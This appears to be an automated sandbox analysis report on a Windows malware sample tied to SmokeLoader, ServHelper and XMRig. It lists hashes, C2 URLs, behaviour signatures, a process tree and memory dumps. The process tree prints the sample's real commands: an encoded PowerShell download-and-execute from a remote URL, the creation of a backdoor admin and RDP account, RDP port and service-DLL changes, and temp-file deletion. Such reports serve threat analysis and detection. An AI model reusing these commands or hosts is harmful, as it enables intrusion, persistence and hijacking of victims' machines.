Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    137s
  • submitted
    01-01-1970 00:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269.exe

  • Size

    184KB

  • MD5

    575f53e97e579df4c6d518e1cfa8470e

  • SHA1

    3cdad2ee89ce48b0ae2877d8f07c061c906418da

  • SHA256

    04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269

  • SHA512

    bba588869964f11d8d7be71c4aca9b35051fd70c65e95159cbe2192627303e6843db235a9cb1cdd28841d9871b42bc5b09b017928962631622c5d8d06bf164dd

Score
10/10
servhelpersmokeloaderxmrigbackdoorminerpersistencetrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

C2

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/
rc4.i32
rc4.i32

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

    trojanbackdoorservhelper
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 24 IoCs
  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269.exe
    "C:\Users\Admin\AppData\Local\Temp\04cb92a516b8932137fbf2b2d7285966a45da0ee567d3730ae8ce71deb1ec269.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:2732
  • C:\Users\Admin\AppData\Local\Temp\5550.exe
    C:\Users\Admin\AppData\Local\Temp\5550.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3376
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:972
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wxudbmg1\wxudbmg1.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1172
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES756A.tmp" "c:\Users\Admin\AppData\Local\Temp\wxudbmg1\CSC9F2143BEB8C94DBAAA53CAF45CADB7.TMP"
          4⤵
            PID:1472
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4036
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2408
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3016
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:3544
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:1172
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1700
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:744
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:1268
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2828
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2156
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3592
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:2468
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1016
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3240
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3884
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:1056
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:848
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:1744
                  • C:\Users\Admin\AppData\Local\Temp\6C34.exe
                    C:\Users\Admin\AppData\Local\Temp\6C34.exe
                    1⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:956
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                      2⤵
                      • Drops file in System32 directory
                      • Drops file in Windows directory
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2772
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rmo2hqzo\rmo2hqzo.cmdline"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2736
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA13D.tmp" "c:\Users\Admin\AppData\Local\Temp\rmo2hqzo\CSCEE12EBC9117949D9AC4892C52FA51FE2.TMP"
                          4⤵
                            PID:780
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                          3⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3572
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                          3⤵
                            PID:364
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                            3⤵
                              PID:3416
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                              3⤵
                                PID:2984
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                3⤵
                                • Modifies registry key
                                PID:3216
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                3⤵
                                  PID:3340
                                • C:\Windows\SysWOW64\net.exe
                                  "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                  3⤵
                                    PID:408
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                      4⤵
                                        PID:1472
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                      3⤵
                                        PID:3092
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c net start rdpdr
                                          4⤵
                                            PID:1352
                                            • C:\Windows\SysWOW64\net.exe
                                              net start rdpdr
                                              5⤵
                                                PID:2296
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start rdpdr
                                                  6⤵
                                                    PID:2196
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                              3⤵
                                                PID:380
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c net start TermService
                                                  4⤵
                                                    PID:2944
                                                    • C:\Windows\SysWOW64\net.exe
                                                      net start TermService
                                                      5⤵
                                                        PID:2500
                                                        • C:\Windows\SysWOW64\net1.exe
                                                          C:\Windows\system32\net1 start TermService
                                                          6⤵
                                                            PID:2384
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                                      3⤵
                                                        PID:2188
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                                        3⤵
                                                          PID:4004
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 1252
                                                        2⤵
                                                        • Program crash
                                                        PID:1032
                                                    • C:\Windows\System32\cmd.exe
                                                      cmd /C net.exe user WgaUtilAcc 000000 /del
                                                      1⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:652
                                                      • C:\Windows\system32\net.exe
                                                        net.exe user WgaUtilAcc 000000 /del
                                                        2⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:3796
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                                                          3⤵
                                                            PID:3108
                                                      • C:\Windows\System32\cmd.exe
                                                        cmd /C net.exe user WgaUtilAcc Rf6xDVV5 /add
                                                        1⤵
                                                          PID:2976
                                                          • C:\Windows\system32\net.exe
                                                            net.exe user WgaUtilAcc Rf6xDVV5 /add
                                                            2⤵
                                                              PID:3092
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 user WgaUtilAcc Rf6xDVV5 /add
                                                                3⤵
                                                                  PID:4028
                                                            • C:\Windows\System32\cmd.exe
                                                              cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                              1⤵
                                                                PID:3716
                                                                • C:\Windows\system32\net.exe
                                                                  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                  2⤵
                                                                    PID:3808
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                      3⤵
                                                                        PID:3028
                                                                  • C:\Windows\System32\cmd.exe
                                                                    cmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
                                                                    1⤵
                                                                      PID:1700
                                                                      • C:\Windows\system32\net.exe
                                                                        net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
                                                                        2⤵
                                                                          PID:3196
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD
                                                                            3⤵
                                                                              PID:1760
                                                                        • C:\Windows\System32\cmd.exe
                                                                          cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                          1⤵
                                                                            PID:2736
                                                                            • C:\Windows\system32\net.exe
                                                                              net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                              2⤵
                                                                                PID:1156
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                                                  3⤵
                                                                                    PID:2732
                                                                              • C:\Windows\System32\cmd.exe
                                                                                cmd /C net.exe user WgaUtilAcc Rf6xDVV5
                                                                                1⤵
                                                                                  PID:1472
                                                                                  • C:\Windows\system32\net.exe
                                                                                    net.exe user WgaUtilAcc Rf6xDVV5
                                                                                    2⤵
                                                                                      PID:1888
                                                                                      • C:\Windows\system32\net1.exe
                                                                                        C:\Windows\system32\net1 user WgaUtilAcc Rf6xDVV5
                                                                                        3⤵
                                                                                          PID:2188
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      cmd.exe /C wmic path win32_VideoController get name
                                                                                      1⤵
                                                                                        PID:744
                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                          wmic path win32_VideoController get name
                                                                                          2⤵
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:3572
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        cmd.exe /C wmic CPU get NAME
                                                                                        1⤵
                                                                                          PID:3776
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic CPU get NAME
                                                                                            2⤵
                                                                                              PID:3040
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                            1⤵
                                                                                              PID:3596
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                2⤵
                                                                                                  PID:3016
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                                    3⤵
                                                                                                    • Blocklisted process makes network request
                                                                                                    • Drops file in Program Files directory
                                                                                                    • Drops file in Windows directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:3300

                                                                                              Network

                                                                                              MITRE ATT&CK Enterprise v6

                                                                                              Replay Monitor

                                                                                              Loading Replay Monitor...

                                                                                              Downloads

                                                                                              • memory/364-656-0x0000000004740000-0x0000000004741000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/364-725-0x000000007EA20000-0x000000007EA21000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/364-657-0x0000000004742000-0x0000000004743000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/956-165-0x0000000008560000-0x0000000008561000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/956-170-0x0000000008A60000-0x0000000008A61000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/956-156-0x0000000005060000-0x0000000005462000-memory.dmp

                                                                                                Filesize

                                                                                                4.0MB

                                                                                                Download

                                                                                              • memory/956-173-0x0000000008F20000-0x0000000008F21000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/956-172-0x0000000008BE0000-0x0000000008BE1000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/956-171-0x0000000007D44000-0x0000000007D45000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/956-150-0x0000000004C55000-0x000000000505B000-memory.dmp

                                                                                                Filesize

                                                                                                4.0MB

                                                                                                Download

                                                                                              • memory/956-163-0x0000000008160000-0x000000000855F000-memory.dmp

                                                                                                Filesize

                                                                                                4.0MB

                                                                                                Download

                                                                                              • memory/956-169-0x0000000007D43000-0x0000000007D44000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/956-166-0x0000000000400000-0x0000000002FA5000-memory.dmp

                                                                                                Filesize

                                                                                                43.6MB

                                                                                                Download

                                                                                              • memory/956-167-0x0000000007D40000-0x0000000007D41000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/956-168-0x0000000007D42000-0x0000000007D43000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/972-129-0x000001AB66D00000-0x000001AB66D02000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-131-0x000001AB66D00000-0x000001AB66D02000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-161-0x000001AB6AC00000-0x000001AB6AC01000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/972-151-0x000001AB66DC6000-0x000001AB66DC8000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-152-0x000001AB66D00000-0x000001AB66D02000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-174-0x000001AB66D00000-0x000001AB66D02000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-176-0x000001AB66D00000-0x000001AB66D02000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-142-0x000001AB66D00000-0x000001AB66D02000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-178-0x000001AB66D00000-0x000001AB66D02000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-180-0x000001AB6BC80000-0x000001AB6BC81000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/972-181-0x000001AB6C010000-0x000001AB6C011000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/972-140-0x000001AB66DC3000-0x000001AB66DC5000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-139-0x000001AB66DC0000-0x000001AB66DC2000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-130-0x000001AB66D00000-0x000001AB66D02000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-149-0x000001AB66D00000-0x000001AB66D02000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-133-0x000001AB66D00000-0x000001AB66D02000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-138-0x000001AB6B6B0000-0x000001AB6B6B1000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/972-134-0x000001AB66D00000-0x000001AB66D02000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-135-0x000001AB6B580000-0x000001AB6B581000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/972-177-0x000001AB66DC8000-0x000001AB66DC9000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/972-132-0x000001AB66D00000-0x000001AB66D02000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-136-0x000001AB66D00000-0x000001AB66D02000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/972-137-0x000001AB66D00000-0x000001AB66D02000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/2408-343-0x0000022FB85A8000-0x0000022FB85AA000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/2408-305-0x0000022FB85A6000-0x0000022FB85A8000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/2408-273-0x0000022FB85A3000-0x0000022FB85A5000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/2408-272-0x0000022FB85A0000-0x0000022FB85A2000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/2732-116-0x0000000004C20000-0x0000000004C29000-memory.dmp

                                                                                                Filesize

                                                                                                36KB

                                                                                                Download

                                                                                              • memory/2732-115-0x0000000004C10000-0x0000000004C18000-memory.dmp

                                                                                                Filesize

                                                                                                32KB

                                                                                                Download

                                                                                              • memory/2732-117-0x0000000000400000-0x0000000002EF4000-memory.dmp

                                                                                                Filesize

                                                                                                43.0MB

                                                                                                Download

                                                                                              • memory/2772-214-0x0000000007C80000-0x0000000007C81000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/2772-189-0x0000000000A70000-0x0000000000A71000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/2772-211-0x0000000007860000-0x0000000007861000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/2772-205-0x00000000075A0000-0x00000000075A1000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/2772-215-0x0000000007F90000-0x0000000007F91000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/2772-271-0x0000000006933000-0x0000000006934000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/2772-204-0x0000000006EA0000-0x0000000006EA1000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/2772-213-0x0000000007660000-0x0000000007661000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/2772-191-0x0000000000A70000-0x0000000000A71000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/2772-207-0x0000000006930000-0x0000000006931000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/2772-208-0x0000000006932000-0x0000000006933000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/2772-217-0x0000000000A70000-0x0000000000A71000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/2772-1531-0x000000007EA00000-0x000000007EA01000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/2772-192-0x00000000047C0000-0x00000000047C1000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/2772-193-0x0000000006F70000-0x0000000006F71000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/3016-385-0x0000020A5E5F6000-0x0000020A5E5F8000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/3016-359-0x0000020A5E5F3000-0x0000020A5E5F5000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/3016-386-0x0000020A5E5F8000-0x0000020A5E5FA000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/3016-358-0x0000020A5E5F0000-0x0000020A5E5F2000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/3020-118-0x0000000000820000-0x0000000000836000-memory.dmp

                                                                                                Filesize

                                                                                                88KB

                                                                                                Download

                                                                                              • memory/3300-1224-0x0000019B47058000-0x0000019B47059000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/3300-1039-0x0000019B47053000-0x0000019B47055000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/3300-1127-0x0000019B47056000-0x0000019B47058000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/3300-1037-0x0000019B47050000-0x0000019B47052000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/3376-125-0x0000024EEEF33000-0x0000024EEEF35000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/3376-124-0x0000024EEEF30000-0x0000024EEEF32000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/3376-127-0x0000024EEEF36000-0x0000024EEEF37000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/3376-122-0x0000024EEF340000-0x0000024EEF73F000-memory.dmp

                                                                                                Filesize

                                                                                                4.0MB

                                                                                                Download

                                                                                              • memory/3376-126-0x0000024EEEF35000-0x0000024EEEF36000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/3416-971-0x0000000004542000-0x0000000004543000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/3416-1036-0x000000007EDB0000-0x000000007EDB1000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/3416-969-0x0000000004540000-0x0000000004541000-memory.dmp

